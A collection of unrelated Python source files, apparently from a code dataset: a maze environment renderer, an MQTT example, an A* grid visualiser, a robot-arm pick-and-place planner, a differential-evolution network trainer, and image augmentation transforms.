state=np.concatenate((agent_pos, self.goal_pos)),\n topdown_image=self.render_pos_top_down(agent_pos, self.goal_pos)\n )\n self._post_step(agent_pos)\n return obs\n\n def _post_step(self, agent_pos):\n self.current_pos = agent_pos\n self.add_goal_dist(self.comp_shortest_dist(self.current_pos[:2], self.goal_pos))\n self._full_traj.append(agent_pos)\n\n def eval(self):\n self._final_shortest_dist = self.comp_shortest_dist(self.current_pos[:2], self.goal_pos)\n return super().eval()\n\n def comp_shortest_dist(self, p1, p2):\n \"\"\"Uses PRM to get the shortest distance between two points within the maze.\"\"\"\n if self.prm_policy is None:\n from gcp.planning.infra.policy.prm_policy.prm_policy import PrmPolicy\n self.prm_policy = PrmPolicy(None, AttrDict(n_samples_per_room=200), None, None, **self.env_policy_params())\n dist, _ = self.prm_policy.compute_shortest_path(p1, p2)\n return dist\n\n def env_policy_params(self):\n def transform_plan(state_plan, action_plan):\n state_plan = self.env.mj2mw(state_plan)\n action_plan = state_plan[:, 1:] - state_plan[:, :-1]\n return state_plan, 
action_plan\n\n conversion_fcns = AttrDict(transform_plan=transform_plan,\n env2prm=self.env.mw2mj,\n prm2env=self.env.mj2mw)\n return {'conversion_fcns': conversion_fcns, 'n_rooms': self._hp.n_rooms}\n\n def render_top_down(self, traj, background=None, goal=None, line_thickness=4, color=(1.0, 0, 0), mark_pts=False):\n \"\"\"Renders a state trajectory in a top-down view.\"\"\"\n if isinstance(color[0], numbers.Number):\n color = [color] * (traj.shape[0] - 1)\n \n img = self._static_img_topdown.copy() if background is None else background.copy()\n traj = traj.copy() # very important!!!\n if goal is not None:\n goal = goal.copy()\n if traj.shape[1] == 5 or traj.shape[1] == 2: goal = goal[:2]; goal[1] *= -1\n if traj.max() > 1.0 or traj.min() < -1.0: goal = goal / 27.0\n goal = goal + 0.5 * self._layout.table_size\n if traj.shape[1] == 5 or traj.shape[1] == 2: traj = traj[:, :2]; traj[:, 1] *= -1\n if traj.max() > 1.0 or traj.min() < -1.0: traj = traj / 27.0 # scale from miniworld env to [-1...1]\n traj = traj + 0.5 * self._layout.table_size\n for i in range(traj.shape[0] - 1):\n cv2.line(img, (int(traj[i, 0] * self._topdown_render_scale),\n img.shape[0] - int(traj[i, 1] * self._topdown_render_scale)),\n (int(traj[i+1, 0] * self._topdown_render_scale),\n img.shape[0] - int(traj[i+1, 1] * self._topdown_render_scale)),\n color[i], line_thickness)\n if mark_pts and i > 0 and i < (traj.shape[0] - 2):\n cv2.line(img, (int(traj[i, 0] * self._topdown_render_scale),\n img.shape[0] - int(traj[i, 1] * self._topdown_render_scale)),\n (int(traj[i, 0] * self._topdown_render_scale),\n img.shape[0] - int(traj[i, 1] * self._topdown_render_scale)),\n (1.0, 0, 0), int(3*line_thickness))\n\n # print start+end position\n img = self.render_pos_top_down(traj[0], traj[-1], background=img, mirror_scale=False)\n if goal is not None:\n img = self.render_pos_top_down(traj[0], goal, background=img, mirror_scale=False, large_goal=True)\n return img\n\n def render_pos_top_down(self,\n current_pose,\n goal_pos,\n background=None,\n mirror_scale=True,\n large_goal=False):\n \"\"\"Renders a state trajectory in a top-down view.\"\"\"\n img = self._static_img_topdown.copy() if background is None else background.copy()\n\n def convert_sim2topdown(pos, img_shape):\n pos = pos.copy() # very important !!!!!\n if mirror_scale:\n pos[1] *= -1\n pos = pos / 27.0 # scale from miniworld env to [-1...1]\n pos = pos + 0.5 * self._layout.table_size\n return (int(pos[0] * self._topdown_render_scale), img_shape[0] - int(pos[1] * self._topdown_render_scale))\n\n curr_pos = convert_sim2topdown(current_pose, img.shape)\n goal_pos = convert_sim2topdown(goal_pos, img.shape)\n\n if self._crop_window is not None:\n # we need to correct for the too large size of img.shape above, therefore -2*self._crop_window\n curr_pos = (curr_pos[0] + self._crop_window, curr_pos[1] + self._crop_window - 2*self._crop_window)\n goal_pos = (goal_pos[0] + self._crop_window, goal_pos[1] + self._crop_window - 2*self._crop_window)\n\n cv2.line(img, curr_pos, curr_pos, (0.0, 0, 1.0), 10)\n cv2.line(img, goal_pos, goal_pos, (0.0, 1.0, 0), 10 if not large_goal else 20)\n\n if self._crop_window is not None:\n # catch rounding errors\n curr_pos = (max(self._crop_window, curr_pos[0]), max(self._crop_window, curr_pos[1]))\n lower, upper = np.asarray(curr_pos) - self._crop_window, np.asarray(curr_pos) + self._crop_window\n img = img[lower[1]:upper[1], lower[0]:upper[0]]\n\n return img\n\n @property\n def adim(self):\n return self._adim\n\n @property\n def sdim(self):\n return 
self._sdim\n\n\nclass TopdownMultiroom3dEnv(Multiroom3dEnv):\n    \"\"\"Image observations are rendered topdown in a window around the agent.\"\"\"\n    def __init__(self, hp, reset_state=None, no_env=False, crop_window=None):\n        assert \"crop_window\" in hp  # need to specify the crop window for topdown rendering\n        temp_hp = copy.deepcopy(hp)\n        crop_window = temp_hp.pop(\"crop_window\")\n        super().__init__(temp_hp, reset_state, no_env, crop_window=crop_window)\n\n    def reset(self, reset_state):\n        obs, reset_state = super().reset(reset_state)\n        obs.images = np.asarray(255*obs.topdown_image.copy(), dtype=np.uint8)[None]\n        return obs, reset_state\n\n    def step(self, action):\n        obs = super().step(action)\n        obs.images = np.asarray(255*obs.topdown_image.copy(), dtype=np.uint8)[None]\n        return obs\n\n","sub_path":"gcp/planning/infra/envs/miniworld_env/multiroom3d/multiroom3d_env.py","file_name":"multiroom3d_env.py","file_ext":"py","file_size_in_byte":11794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"15466657","text":"#########################################\n# MqttBroker.py\n# more info @: http://myrobotlab.org/service/MqttBroker\n#########################################\nfrom time import sleep\n\n# start services\nmqtt = runtime.start(\"mqtt\", \"Mqtt\")\nbroker = runtime.start(\"broker\", \"MqttBroker\")\npython = runtime.start(\"python\", \"Python\")\n\n# start the local mqtt broker on standard port\nbroker.listen()\n\ntopic = \"echoTopic\"\n\nmqtt.connect(\"tcp://localhost:1883\")\n# authentication mqtt.connect(broker,\"guest\",\"guest\")\n \nmqtt.subscribe(topic)\n\n# qos = 1 # At most once (0), At least once (1), Exactly once (2).\nmqtt.publish(\"echoTopic\", \"hello myrobotlab world\")\npython.subscribe(\"mqtt\", \"publishMqttMsg\")\n# or mqtt.addListener(\"publishMqttMsgString\", \"python\")\n \n# publishMqttMsg --> onMqttMsg(msg)\ndef onMqttMsg(msg):\n    print (\"message : \", msg)\n\n\nfor i in range(30):\n    mqtt.publish(topic, \"hello myrobotlab ! 
\" + str(i))\n sleep(0.5)\n","sub_path":"src/main/resources/resource/MqttBroker/MqttBroker.py","file_name":"MqttBroker.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"173796153","text":"import pygame\nimport numpy as np\nfrom a_star import Grid, Node\n\n\ndef compute_path(grid, start, finish, show_try_path=False):\n graph_grid = Grid(get_numpy_grid_from_list_grid(grid))\n path_trace = graph_grid.a_star(Node(start), Node(finish))\n\n if show_try_path:\n for key in path_trace.keys():\n grid[key[0]][key[1]] = 5\n\n if finish not in path_trace:\n return grid\n\n current_node = path_trace[finish].parent\n\n while current_node != start:\n grid[current_node[0]][current_node[1]] = 4\n current_node = path_trace[current_node].parent\n\n return grid\n\n\ndef set_screen(window_size, grid_size, margin):\n grid_tile_width = ((window_size[0] - margin) / grid_size[0]) - margin\n grid_tile_height = ((window_size[1] - margin) / grid_size[1]) - margin\n screen = pygame.display.set_mode(window_size, pygame.HWSURFACE |\n pygame.DOUBLEBUF | pygame.RESIZABLE)\n\n return screen, grid_tile_width, grid_tile_height\n\n\ndef get_numpy_grid_from_list_grid(list_grid):\n return np.array(map(lambda column: map(lambda i: np.inf if i == 1 else 1,\n column), list_grid))\n\n\ndef main():\n # colors\n white = (255, 255, 255)\n black = (0, 0, 0)\n red = (255, 0, 0)\n green = (0, 255, 0)\n blue = (0, 0, 255)\n\n # board colors\n background_color = black\n tile_color_filled = black\n tile_color_blank = white\n start_color = red\n finish_color = green\n path_color = blue\n try_color = (200, 200, 200)\n\n margin = 1\n window_size = (1000, 1000)\n grid_size = (100, 100)\n\n screen, grid_tile_width, grid_tile_height = set_screen(window_size,\n grid_size, margin)\n\n grid = [[0] * grid_size[1] for i in xrange(grid_size[0])]\n changes_grid = [[False] * grid_size[1] for i in xrange(grid_size[0])]\n done = False\n mouse_pressed = False\n screen_modf = True\n user_set_start = False\n start_tile = None\n end_tile = None\n\n pygame.display.set_caption(\"A* Testing\")\n clock = pygame.time.Clock()\n\n while not done:\n events = pygame.event.get()\n for event in events:\n if event.type == pygame.QUIT:\n done = True\n\n elif event.type == pygame.VIDEORESIZE:\n mouse_pressed = False\n window_size = event.dict['size']\n screen, grid_tile_width, grid_tile_height = \\\n set_screen(window_size, grid_size, margin)\n screen_modf = True\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_r:\n if (start_tile and end_tile) is not None:\n grid = compute_path(grid, start_tile, end_tile, True)\n screen_modf = True\n if event.key == pygame.K_c:\n grid = [[0] * grid_size[1] for i in xrange(grid_size[0])]\n changes_grid = [[False] * grid_size[1] for i in\n xrange(grid_size[0])]\n done = False\n mouse_pressed = False\n screen_modf = True\n user_set_start = False\n start_tile = None\n end_tile = None\n if ((event.key == pygame.K_s) and\n ((start_tile and end_tile) is not None)):\n grid_object = Grid(get_numpy_grid_from_list_grid(grid))\n grid_object.save(\"grid\", \"../tests/boards/\",\n start_tile, end_tile)\n\n if event.type == pygame.MOUSEMOTION and mouse_pressed:\n pos = pygame.mouse.get_pos()\n y = pos[0] // (grid_tile_width + margin)\n x = pos[1] // (grid_tile_height + margin)\n if x >= grid_size[0] or y >= grid_size[1]:\n continue\n if not changes_grid[x][y]:\n changes_grid[x][y] = True\n if (x, y) == start_tile:\n start_tile = None\n if (x, 
y) == end_tile:\n end_tile = None\n grid[x][y] = int(not grid[x][y])\n screen_modf = True\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n if pygame.mouse.get_pressed()[2]:\n pos = pygame.mouse.get_pos()\n y = pos[0] // (grid_tile_width + margin)\n x = pos[1] // (grid_tile_height + margin)\n if x >= grid_size[0] or y >= grid_size[1]:\n continue\n if not changes_grid[x][y]:\n if user_set_start:\n if end_tile is not None:\n grid[end_tile[0]][end_tile[1]] = 0\n grid[x][y] = 3\n end_tile = (x, y)\n if end_tile == start_tile:\n start_tile = None\n else:\n if start_tile is not None:\n grid[start_tile[0]][start_tile[1]] = 0\n grid[x][y] = 2\n start_tile = (x, y)\n if end_tile == start_tile:\n end_tile = None\n user_set_start = not user_set_start\n screen_modf = True\n else:\n mouse_pressed = True\n\n if event.type == pygame.MOUSEBUTTONUP:\n mouse_pressed = False\n changes_grid = [[False] * grid_size[1] for i in\n xrange(grid_size[0])]\n\n if screen_modf:\n screen.fill(background_color)\n for x, row in enumerate(grid):\n for y, v in enumerate(row):\n color = [tile_color_blank, tile_color_filled, start_color,\n finish_color, path_color, try_color][v]\n pygame.draw.rect(screen, color,\n [(margin + grid_tile_width) * y + margin,\n (margin + grid_tile_height) * x + margin,\n grid_tile_width, grid_tile_height])\n\n pygame.display.flip()\n screen_modf = False\n clock.tick(60)\n\n pygame.quit()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"AStarRoute/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":6538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"639571291","text":"import numpy as np\nimport img_processing as ip\nimport rvm1_ik as ik\nimport matplotlib.pyplot as plt\nimport cv2\n\nfrom scipy.spatial import ConvexHull, convex_hull_plot_2d\n\npickup_height = 21\npyramid_index = 0\n\npyramid_hgap = 6\npyramid_layer_height = 43\ncontainer_raidus = 17.5\n \nremoved_circles = []\npresent_circles = [0, 1, 2, 3, 4, 5]\nworld_circles, image_circles, processed_snap = ip.img_process('calibrate.jpg', 'snap.jpg')\n\ndef get_nearest_circle(circle_index):\n\n cost = 9999999999\n nearest_circle_index = circle_index\n\n x = world_circles[circle_index][0]\n y = world_circles[circle_index][1]\n\n for i in range(len(world_circles)):\n\n if (i == circle_index):\n continue\n\n test_x = world_circles[i][0]\n test_y = world_circles[i][1]\n\n temp_cost = np.sqrt((x - test_x) ** 2 + (y - test_y) ** 2)\n\n if(temp_cost <= cost):\n cost = temp_cost\n nearest_circle_index = i\n\n return nearest_circle_index\n\ndef get_cost(index):\n\n cost = 0\n\n for i in range(len(world_circles)):\n cost += (world_circles[index][0] - world_circles[i][0]) ** 2 + (world_circles[index][1] - world_circles[i][1]) ** 2\n \n #print(cost)\n\n return cost\n\ndef convex_hull():\n\n centers = []\n\n for i in range(len(world_circles)):\n\n if not i in present_circles:\n continue\n \n centers.append([world_circles[i][0], world_circles[i][1]])\n\n max_cost = 0\n max_cost_index = 0\n\n if (len(present_circles) <= 1):\n return 0\n elif (len(present_circles) <= 2):\n if get_cost(present_circles[0]) > get_cost(present_circles[1]):\n return 0\n else:\n return 1\n\n hull = ConvexHull(centers)\n\n for i in range(len(hull.vertices)):\n #print(hull.vertices[i])\n #print(centers[hull.vertices[i]][0], centers[hull.vertices[i]][1])\n\n #_, phi = ik.inverse_kinematics(world_circles[hull.vertices[i]][0], world_circles[hull.vertices[i]][1], pickup_height)\n #phi = np.rad2deg(phi)\n \n #if 
phi != -90.0:\n # print(phi)\n # cost = 0\n #else:\n cost = get_cost(present_circles[hull.vertices[i]])\n\n if(cost > max_cost):\n max_cost = cost\n max_cost_index = hull.vertices[i]\n \n #print(max_cost_index)\n\n return max_cost_index\n\ndef write_commands(joint_variables, prev_joint_variables):\n\n delta_q1 = joint_variables[0] - prev_joint_variables[0]\n delta_q2 = joint_variables[1] - prev_joint_variables[1]\n delta_q3 = joint_variables[2] - prev_joint_variables[2]\n delta_q4 = joint_variables[3] - prev_joint_variables[3]\n delta_q5 = joint_variables[4] - prev_joint_variables[4]\n\n command_q1 = -np.round(float(np.rad2deg(delta_q1)), 1)\n command_q2 = np.round(float(np.rad2deg(delta_q2)), 1)\n command_q3 = np.round(float(np.rad2deg(delta_q3)), 1)\n command_q4 = np.round(float(np.rad2deg(delta_q4)), 1)\n command_q5 = np.round(float(np.rad2deg(delta_q5)), 1)\n\n f.write(\"MJ {},{},{},{},{}\\n\".format(command_q1, command_q2, command_q3, command_q4, command_q5))\n\nprint(\"\\nImage Circles:\\n{}\\n\".format(image_circles))\nprint(\"World Circles:\\n{}\".format(world_circles))\n\npyramid_coordinates = [[380, -(pyramid_hgap + (2 * container_raidus)), pickup_height],\n [380, 0, pickup_height],\n [380, pyramid_hgap + (2 * container_raidus), pickup_height],\n [380, -(pyramid_hgap + (2 * container_raidus)) / 2, pickup_height + pyramid_layer_height],\n [380, (pyramid_hgap + (2 * container_raidus)) / 2, pickup_height + pyramid_layer_height],\n [380, 0, pickup_height + pyramid_layer_height * 2]]\n\nfor i, circle in enumerate(world_circles):\n\n index = convex_hull()\n removed_circles.append(present_circles.pop(index))\n\nprint(\"\\nRemoved Circles: \", removed_circles)\nprint(\"Present Circles:\", present_circles)\n\nf = open(\"rvm1_project3.txt\", \"w+\")\nf.write(\"NT\\nOG\\nMJ 0,0,0,0,-8\\nTI 10\\n\")\n\nprev_joint_variables = [0.0, 0.0, 0.0, 0.0, 0.0]\n\n#world_circles[1] = [420, 150, 17]\n\nheight_multiplier = 3.5\n\niteration = 0\n\nordered_circles = []\nunreachable_circles = []\n\nfor i in removed_circles:\n\n joint_variables, phi = ik.inverse_kinematics(world_circles[i][0], world_circles[i][1], pickup_height)\n phi = np.rad2deg(phi)\n\n if phi == -90.0:\n ordered_circles.append(i)\n \n if phi != -90.0:\n unreachable_circles.append(i)\n\nordered_circles.extend(unreachable_circles)\n\nfor i in ordered_circles:\n\n # Place gripper above object\n joint_variables, phi = ik.inverse_kinematics(world_circles[i][0], world_circles[i][1], height_multiplier * pickup_height)\n phi = np.rad2deg(phi)\n\n if phi == -90.0:\n nearest_circle_index = get_nearest_circle(i)\n joint_variables[4] = ik.gripper_orientation([world_circles[i][0], world_circles[i][1]], [world_circles[nearest_circle_index][0], world_circles[nearest_circle_index][1]])\n\n print(\"\\nPlace gripper above object.\")\n print(\"Joint Variables: \\n{}\".format(np.rad2deg(joint_variables)))\n print(\"phi: {}\".format(phi))\n ik.compute_coordinates(joint_variables)\n\n processed_snap = ip.draw_arrowed_line(processed_snap, (image_circles[i][0], image_circles[i][1]), image_circles[i][2], joint_variables[4])\n\n write_commands(joint_variables, prev_joint_variables)\n prev_joint_variables = joint_variables.copy()\n\n # Pickup object\n joint_variables, phi = ik.inverse_kinematics(world_circles[i][0], world_circles[i][1], pickup_height)\n phi = np.rad2deg(phi)\n pickup_phi = phi\n\n if phi == -90.0:\n nearest_circle_index = get_nearest_circle(i)\n joint_variables[4] = ik.gripper_orientation([world_circles[i][0], world_circles[i][1]], 
[world_circles[nearest_circle_index][0], world_circles[nearest_circle_index][1]])\n\n print(\"\\nPick-up object.\")\n print(\"Joint Variables: \\n{}\".format(np.rad2deg(joint_variables)))\n print(\"phi: {}\".format(phi))\n ik.compute_coordinates(joint_variables)\n\n write_commands(joint_variables, prev_joint_variables)\n prev_joint_variables = joint_variables.copy()\n f.write(\"GC\\n\")\n\n # Raise gripper\n joint_variables, phi = ik.inverse_kinematics(world_circles[i][0], world_circles[i][1], height_multiplier * pickup_height, pickup_phi)\n phi = np.rad2deg(phi)\n\n print(\"\\nRaise gripper with object.\")\n print(\"Joint Variables: \\n{}\".format(np.rad2deg(joint_variables)))\n print(\"phi: {}\".format(phi))\n ik.compute_coordinates(joint_variables)\n\n write_commands(joint_variables, prev_joint_variables)\n prev_joint_variables = joint_variables.copy()\n\n # Re-place object to properly grip\n if pickup_phi != -90.0:\n\n joint_variables, phi = ik.inverse_kinematics(280, 250, height_multiplier * pickup_height, pickup_phi)\n phi = np.rad2deg(phi)\n\n print(\"\\nPlace gripper with object above stopover point.\")\n print(\"Joint Variables: \\n{}\".format(np.rad2deg(joint_variables)))\n print(\"phi: {}\".format(pickup_phi))\n ik.compute_coordinates(joint_variables)\n\n write_commands(joint_variables, prev_joint_variables)\n prev_joint_variables = joint_variables.copy()\n\n joint_variables, phi = ik.inverse_kinematics(280, 250, pickup_height, pickup_phi)\n phi = np.rad2deg(phi)\n\n print(\"\\nPlace object on stopover point.\")\n print(\"Joint Variables: \\n{}\".format(np.rad2deg(joint_variables)))\n print(\"phi: {}\".format(pickup_phi))\n ik.compute_coordinates(joint_variables)\n\n write_commands(joint_variables, prev_joint_variables)\n prev_joint_variables = joint_variables.copy()\n f.write(\"GO\\n\")\n\n joint_variables, phi = ik.inverse_kinematics(280, 250, pickup_height)\n phi = np.rad2deg(phi)\n\n print(\"\\nFix grip on object.\")\n print(\"Joint Variables: \\n{}\".format(np.rad2deg(joint_variables)))\n print(\"phi: {}\".format(phi))\n ik.compute_coordinates(joint_variables)\n\n write_commands(joint_variables, prev_joint_variables)\n prev_joint_variables = joint_variables.copy()\n f.write(\"GC\\n\")\n\n # Place gripper above pyramid position\n joint_variables, phi = ik.inverse_kinematics(pyramid_coordinates[pyramid_index][0], pyramid_coordinates[pyramid_index][1], 20 + pyramid_coordinates[pyramid_index][2])\n phi = np.rad2deg(phi)\n joint_variables[4] = np.deg2rad(90)\n\n print(\"\\nPlace gripper above pyramid position.\")\n print(\"Joint Variables: \\n{}\".format(np.rad2deg(joint_variables)))\n print(\"phi: {}\".format(phi))\n ik.compute_coordinates(joint_variables)\n\n write_commands(joint_variables, prev_joint_variables)\n prev_joint_variables = joint_variables.copy()\n\n # Place object\n joint_variables, phi = ik.inverse_kinematics(pyramid_coordinates[pyramid_index][0], pyramid_coordinates[pyramid_index][1], pyramid_coordinates[pyramid_index][2])\n phi = np.rad2deg(phi)\n joint_variables[4] = np.deg2rad(90)\n\n print(\"\\nPlace object on pyramid.\")\n print(\"Joint Variables: \\n{}\".format(np.rad2deg(joint_variables)))\n print(\"phi: {}\".format(phi))\n ik.compute_coordinates(joint_variables)\n\n write_commands(joint_variables, prev_joint_variables)\n prev_joint_variables = joint_variables.copy()\n f.write(\"GO\\n\")\n\n # Place gripper above pyramid position\n joint_variables, phi = ik.inverse_kinematics(pyramid_coordinates[pyramid_index][0], pyramid_coordinates[pyramid_index][1], 
20 + pyramid_coordinates[pyramid_index][2])\n phi = np.rad2deg(phi)\n joint_variables[4] = np.deg2rad(90)\n\n print(\"\\nPlace gripper above pyramid position.\")\n print(\"Joint Variables: \\n{}\".format(np.rad2deg(joint_variables)))\n print(\"phi: {}\".format(phi))\n ik.compute_coordinates(joint_variables)\n\n write_commands(joint_variables, prev_joint_variables)\n prev_joint_variables = joint_variables.copy()\n\n pyramid_index += 1\n\ncv2.namedWindow('Processed Image', cv2.WINDOW_NORMAL)\ncv2.resizeWindow('Processed Image', 885, 420)\ncv2.imshow('Processed Image', processed_snap)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\nprint(\"Ordered circles: {}\".format(ordered_circles))\nprint(\"Unreachable circles: {}\".format(unreachable_circles))\n","sub_path":"ee236/project3/rvm1_picknplace.py","file_name":"rvm1_picknplace.py","file_ext":"py","file_size_in_byte":10240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"504911606","text":"# diff_evolution.py\n# Defines the differential evolution algorithm for learning a neural network.\n\nimport math\nimport numpy as np\nimport random as rd\nimport src.util.activations as af\nfrom src.network import Network\nfrom src.data import *\nfrom functools import reduce\n\n\n# DE is a population based optimizer that perturbs vectors using scaled differences of randomly generated\n# individual vectors\nclass DiffEvolution:\n # Creates an instance of the differential evolution (DE) algorithm. The DE trains the given network according to the\n # given parameters.\n # * network: the network object to train. (fitness function / objective function)\n # * pop_size: the size of the population; the number of particles.\n # * mutationF: the coefficient influencing how much to bias amount of mutation occurring.\n # * recombinationC: the coefficient influencing how much cross over occurs between the individual and mutant.\n def __init__(self, network: Network, mutation_f: float, recombination_c: float, pop_size=30):\n self.network = network # Minimize the objective function by optimizing the values of the network weights\n self.mutationF = mutation_f # Mutation rate\n self.recombinationC = recombination_c # Recombination rate\n self.population_size = pop_size\n self.individual_feature_size = self.network.get_num_weights() # Individuals features\n self.population = self.initialize_population() # Initialize Population\n self.run_nn_on_pop_weights()\n self.test_pop = self.population # used so we can compare old weights with new weights\n self.run()\n\n def run_nn_on_pop_weights(self):\n \"\"\"Uncomment for testing\"\"\"\n # fitness = []\n # cnt = 0\n # for individual in self.population:\n # print(individual)\n # print(self.get_fitness(individual))\n # fitness.append(self.get_fitness(individual))\n # cnt += 1\n # print(fitness)\n pass\n\n def initialize_population(self):\n \"\"\"Initialize Population by randomly selecting feature values for each individual within the population.\"\"\"\n bounds = -2000, 2000\n population = []\n for individual in range(self.population_size):\n individual = np.random.uniform(low=bounds[0], high=bounds[1],\n size=self.individual_feature_size) # Create Individual\n population.append(individual) # Add individual to population\n return population\n\n def mutation(self, loc):\n \"\"\"Mutation is used to allow us to explore our space to find a good solution. To do this we select three\n individuals at random from the current population. 
We then perform mutation to create our mutant\"\"\"\n        # Get random indices of the population entries we're going to change\n        mutation_idx = rd.sample(range(0, len(self.population)-1), 3)\n        first_chosen_one = np.asarray(self.population[mutation_idx[0]])\n        second_chosen_one = np.asarray(self.population[mutation_idx[1]])\n        third_chosen_one = np.asarray(self.population[mutation_idx[2]])\n        mutant = first_chosen_one + self.mutationF * (second_chosen_one - third_chosen_one)\n        return mutant\n\n    def recombination(self, loc, mutant):\n        \"\"\"Perform crossover on each of our features within an individual\"\"\"\n        for i in range(self.individual_feature_size):\n            we_do_replace = rd.uniform(0, 1) > self.recombinationC\n            if we_do_replace:\n                self.test_pop[loc][i] = mutant[i]\n\n    def run(self):\n        \"\"\"Runs the differential evolution optimization on each individual and finds the most fit individual within\n        the space.\"\"\"\n        iteration = 20\n        best_performance = 0\n        best_individual = []\n        for i in range(iteration):  # For i amt of iterations\n            for loc in range(len(self.population) - 1):  # For each individual\n                mutant = self.mutation(loc)  # Mutate\n                individual = self.population[loc]\n                self.recombination(loc, mutant)  # Perform crossover\n                old_performance = self.get_fitness(individual)\n                test_pop_individual = self.test_pop[loc]  # Test with new weights\n                new_performance = self.get_fitness(test_pop_individual)\n\n                if new_performance > best_performance:\n                    best_performance = new_performance\n                    best_individual = self.test_pop[loc]\n\n                if old_performance < new_performance:  # if performance is better we replace the population with the mutant\n                    self.network.weights = self.encode(self.test_pop[loc])  # These weights were better\n                    self.population = self.test_pop  # Let's update population to reflect this\n        self.network.weights = self.encode(best_individual)\n\n    def encode(self, individual):\n        \"\"\"Encodes a vector into matrices that represent the Feed Forward Neural Network\"\"\"\n        weights = []\n        i = 0\n        for shape in self.network.get_weight_shapes():\n            size = reduce((lambda x, y: x * y), shape)\n            weights.append(np.reshape(individual[i:i + size], shape))\n            i += size\n        return weights\n\n    # Returns the fitness of the individuals current state.\n    # The fitness is evaluated on the training set for the network.\n    # The fitness is accuracy if a classification problem, and the inverse error for regression.\n    def get_fitness(self, individual):\n        \"\"\"Determine the fitness of an individual\"\"\"\n        old_weights = self.network.weights\n        self.network.weights = self.encode(individual)\n        if self.network.is_regression():\n            fitness = 1 / self.network.get_error(self.network.training_data)\n        else:\n            fitness = self.network.get_accuracy(self.network.training_data)\n        self.network.weights = old_weights\n        return fitness\n","sub_path":"src/training/diff_evolution.py","file_name":"diff_evolution.py","file_ext":"py","file_size_in_byte":5965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"483831925","text":"import os\nimport torch\nimport numpy as np\nimport cv2\nimport random\n\ndef getMaxThread(image):\n    \"\"\"\n    # If the image has not been normalized to [0, 1], use 255 as the pixel maximum\n    \"\"\"\n    if image.max() > 10:\n        maxthread = 255\n    else:\n        maxthread = 1\n    return maxthread\n\n\nclass RandomCrop(object):\n    \"\"\"Randomly crop the image in a sample.\n\n    Args:\n    \n    \"\"\"\n\n    def __init__(self):\n        pass\n\n    def __call__(self, sample):\n\n        image, annots = sample['img'], sample['annot']\n\n        h,w,c = image.shape\n        \n        annots[:,2] = annots[:,2] + annots[:,0]\n        annots[:,3] = annots[:,3] + annots[:,1]\n        # Find the outer bounding box that encloses all targets\n        xmin = max(annots[:,0].min()-10,0)\n        ymin = max(annots[:,1].min()-10,0)\n        xmax = min(annots[:,2].max()+10,w)\n        ymax = min(annots[:,3].max()+10,h)\n        \n        top = np.random.randint(0,int(ymin//2))\n        bottom = np.random.randint(int((h-ymax)//2+ymax),h)\n        left = np.random.randint(0,int(xmin//2))\n        right = np.random.randint(int((w-xmax)//2+xmax),w)\n        \n        # Make the crop square so that later resizing does not stretch the image\n        max_size = max(bottom - top,right - left)\n        bottom = top + max_size\n        right = left + max_size\n        \n        print([top,bottom,left,right])\n        image = image[top: bottom,left: right]\n\n        annots[:,2] = annots[:,2] - annots[:,0]\n        annots[:,3] = annots[:,3] - annots[:,1]\n        print(annots)\n        annots[:,:2] = annots[:,:2] - [left,top]\n        print(annots)\n        return {'img': image, 'annot': annots}\n\n\nclass RandomFlip(object):\n    def __call__(self, sample):\n        image, annots = sample['img'], sample['annot']\n        if random.random()<0.5:\n            image = cv2.flip(image,1)\n            annots[:,0] = image.shape[1]-annots[:,0] - annots[:,2]\n        if random.random()<0.5:\n            image = cv2.flip(image,0)\n            annots[:,1] = image.shape[0]-annots[:,1] - annots[:,3]\n\n        return {'img': image, 'annot': annots}\n\n\nclass RandomGaussianBlur(object):\n    def __init__(self, p=0.5):\n        self.p = p\n    def __call__(self, sample):\n\n        image, annots = sample['img'], sample['annot']\n        if random.random() < self.p:\n            image = cv2.GaussianBlur(image,(15,15),0)\n        return {'img': image, 'annot': annots}\n\n\nclass RandomSwap(object):\n    \"\"\"\n    # Randomly swap the image channels\n    \"\"\"\n    def __call__(self, sample):\n        image, annots = sample['img'], sample['annot']\n        perms = ((0, 1, 2), (0, 2, 1),\n                 (1, 0, 2), (1, 2, 0),\n                 (2, 0, 1), (2, 1, 0))\n        if random.random() < 0.5:\n            swap = perms[random.randrange(0, len(perms))]\n            image = image[:, :, swap]\n        return {'img': image, 'annot': annots}\n\n\nclass RandomContrast(object):\n    \"\"\"\n    # Randomly adjust the contrast\n    \"\"\"\n    def __init__(self, lower=0.5, upper=1.5):\n        self.lower = lower\n        self.upper = upper\n    def __call__(self, sample): \n        image, annots = sample['img'], sample['annot']\n        if random.random() < 0.5:\n            # image = image.astype(np.float32).copy()\n            maxthread = getMaxThread(image)\n            alpha = random.uniform(self.lower, self.upper)\n            image *= alpha\n            image = image.clip(min=0, max=maxthread)\n        return {'img': image, 'annot': annots}\n\n\nclass RandomSaturation(object):\n    \"\"\"\n    # Randomly adjust the saturation\n    \"\"\"\n    def __init__(self, lower=0.5, upper=1.5):\n        self.lower = lower\n        self.upper = upper\n    def __call__(self, sample): \n        image, annots = sample['img'], sample['annot'] \n        if random.random() < 0.5:\n            # image = image.astype(np.float32).copy()\n            rotate = random.uniform(self.lower, self.upper)\n            print(rotate)\n            c = random.randint(0,2)\n            maxthread = getMaxThread(image)\n            image[:, :, c] = np.clip(image[:, :, c] * rotate,0,maxthread)\n        return {'img': image, 'annot': annots}\n\n\n### not used\nclass RandomHue(object):\n\n    def __init__(self, delta=90/255):\n        self.delta = delta\n\n    # Randomly adjust the hue ((-180, 180) in HSV space)\n    def __call__(self, sample): \n        image, annots = sample['img'], sample['annot'] \n        if random.random() < 0.5:\n            maxthread = getMaxThread(image)\n            self.delta *= maxthread\n            # image = image.astype(np.float32).copy()\n            image[:, :, 0] = np.clip(image[:, :, 0] + random.uniform(-self.delta, self.delta),0,maxthread)\n        return {'img': image, 'annot': annots} 